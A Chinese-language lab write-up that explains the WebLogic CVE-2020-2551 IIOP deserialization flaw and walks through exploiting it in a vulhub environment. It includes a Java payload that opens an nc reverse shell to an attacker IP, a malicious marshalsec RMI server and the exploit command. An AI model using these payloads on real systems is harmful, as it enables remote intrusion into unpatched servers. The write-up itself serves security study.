前言
2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。
经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
环境搭建
直接使用vulhub中的CVE-2017-10271就可以
使用git克隆到本地
git clone https://github.com/vulhub/vulhub.git
进入对应环境
cd vulhub/weblogic/CVE-2017-10271
启动docker漏洞环境
sudo docker-compose up -d
搭建完成以后,访问7001/console如下图所示即为搭建成功
检测是否存在漏洞
python3 CVE-2020-2551.py -u http://192.168.52.128:7001/
发现存在漏洞
漏洞利用
攻击机ip:192.168.0.101
靶机ip:192.168.52.128
攻击机开启监听nc -lvnp 3333
编写一个exp.java文件:
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","nc -e /bin/bash 192.168.0.101 3333"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}其中"nc -e /bin/bash 192.168.52.130 3333"是要执行的命令
然后进行编译,生成出一个exp.class文件
启一个web服务,需要与exp.class在同一文件夹
使用marshalsec起一个恶意的RMI服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.101/#exp" 1099
然后开始进行攻击,使用命令,成功弹出shell:
java -jar weblogic_CVE_2020_2551.jar 192.168.52.128 7001 rmi://192.168.0.101:1099/exp
下载工具获取私信
